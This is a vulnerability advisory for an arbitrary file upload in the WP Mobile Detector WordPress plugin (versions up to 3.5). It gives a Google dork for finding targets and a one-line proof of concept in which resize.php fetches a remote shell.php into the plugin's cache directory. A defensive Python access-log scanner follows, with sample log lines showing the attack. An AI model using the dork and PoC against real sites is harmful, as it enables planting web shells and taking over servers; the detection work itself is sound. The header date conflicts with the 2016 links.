#Exploit Title: WP Mobile Detector <=3.5 Arbitrary File upload
#Google Dork: inurl: /wp-includes/plugins/wp-mobile-detector
#Date: 1-06-2015
#Exploit Author: Aaditya Purani
#Author Details: https://aadityapurani.com
#Vendor: https://wordpress.org/plugins/wp-mobile-detector/changelog
#Version: 3.5
#Tested on: Kali Linux 2.0 Sana / Windows 10

This vulnerability was disclosed to the public yesterday: WP Mobile Detector versions <=3.5 contain an arbitrary file upload through which an attacker can upload malicious PHP files (a shell) to the website. Over 10,000 users are affected. The vendor has released a patch in versions 3.6 & 3.7, see https://wordpress.org/plugins/wp-mobile-detector/changelog/ .

I have written a complete POC post:

https://aadityapurani.com/2016/06/03/mobile-detector-poc/

I have made a POC video here:

https://www.youtube.com/watch?v=ULE1AVWfHTU

Simple POC:

Go to:

[wordpress site path].com/wp-content/plugins/wp-mobile-detector/resize.php?src=[link to your shell.php]

and the fetched file is saved in the directory:

/wp-content/plugins/wp-mobile-detector/cache/shell.php
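As an added defender-side example (not part of the original advisory), the Python snippet below scans web-server access-log lines for the two observable stages of this issue: a resize.php request whose src parameter is a remote URL (the fetch-and-store step described above), and a later request for a .php file under the plugin's cache/ directory (the stored file being executed). The log lines, IP addresses and file name are constructed for the example.

```python
"""Flag WP Mobile Detector (<=3.5) resize.php abuse in combined-format access logs."""
import re
from urllib.parse import parse_qs, unquote, urlparse

PLUGIN = "/wp-content/plugins/wp-mobile-detector/"
RESIZE = PLUGIN + "resize.php"
CACHE = PLUGIN + "cache/"

# Apache/nginx combined log: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Constructed sample: one exploitation sequence, one legitimate resize, one unrelated hit.
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Jun/2016:10:12:01 +0000] "GET /wp-content/plugins/wp-mobile-detector/'
    'resize.php?src=http://198.51.100.7/shell.php HTTP/1.1" 200 512',
    '203.0.113.5 - - [03/Jun/2016:10:12:03 +0000] "GET /wp-content/plugins/wp-mobile-detector/'
    'cache/shell.php HTTP/1.1" 200 1024',
    '198.51.100.20 - - [03/Jun/2016:10:13:00 +0000] "GET /wp-content/plugins/wp-mobile-detector/'
    'resize.php?src=wp-content/uploads/2016/06/logo.png&w=300 HTTP/1.1" 200 20480',
    '192.0.2.9 - - [03/Jun/2016:10:14:00 +0000] "GET /index.php HTTP/1.1" 200 4096',
]


def classify(line):
    """Return (client_ip, finding) when a line matches an attack stage, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _ts, _method, target, status, _size = m.groups()
    url = urlparse(target)
    path = unquote(url.path)
    if path == RESIZE:
        src = parse_qs(url.query).get("src", [""])[0]
        # The vulnerable version fetches whatever src names and writes it to cache/,
        # so a src carrying a URL scheme is the fingerprint of the upload attempt.
        if re.match(r"^[a-z][a-z0-9+.-]*://", src, re.I):
            return ip, "remote fetch via resize.php src=" + src
    elif path.startswith(CACHE) and path.lower().endswith(".php"):
        # The plugin cache should only hold resized images; a PHP request here
        # means a dropped file is being executed (status shows whether it ran).
        return ip, "php executed from plugin cache: %s (status %s)" % (path, status)
    return None


def scan(lines):
    """Run classify over an iterable of log lines and collect the findings."""
    return [hit for hit in (classify(l) for l in lines) if hit]


if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG):
        print(ip, finding)
```

Run it against a real access log by feeding `open(path)` to `scan`; any hit on the second stage with a 200 status means the cache directory should be inspected immediately.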